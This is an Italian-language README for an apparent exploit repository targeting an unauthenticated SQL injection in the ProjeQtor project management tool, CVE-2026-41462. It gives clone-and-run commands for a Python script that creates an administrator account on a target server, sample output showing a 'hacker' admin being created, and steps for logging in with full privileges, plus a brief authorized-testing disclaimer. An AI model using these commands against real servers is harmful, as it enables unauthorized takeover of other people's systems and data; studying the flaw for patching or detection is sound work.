
CVE-2026-41462
SQL Injection critica non autenticata in ProjeQtor ≤ 12.4.3
CVE-2026-41462 è una vulnerabilità critica di SQL Injection non autenticata nella funzionalità di accesso dello strumento di gestione progetti ProjeQtor.
python3 CVE-2026-41462.py -u http://target.com --create-admin
# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
--username admin123 --password StrongPass2026!
Quando l'exploit ha successo, vedrai un output simile a questo:
[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php
Apri il browser e vai su:
http://target.com/login.php
Accedi utilizzando le credenziali mostrate nell'output dello script.
Se l'accesso riesce, ti ritroverai nella Dashboard Amministrativa di ProjeQtor con pieni privilegi amministrativi.
Indicatori di Successo:
| File | Descrizione |
|---|---|
CVE-2026-41462.py | Script principale di sfruttamento |
CVE-2026-41462.yaml | Template di rilevamento Nuclei |
README.md | Questa documentazione |
Clona il repository:
git clone https://github.com/0xBlackash/CVE-2026-41462.git
cd CVE-2026-41462
Esegui l'exploit:
python3 CVE-2026-41462.py -u http://target.com --create-admin
Accedi con l'account amministratore appena creato.
Questo strumento è destinato esclusivamente a scopi educativi e test di penetrazione autorizzati. L'uso non autorizzato è illegale.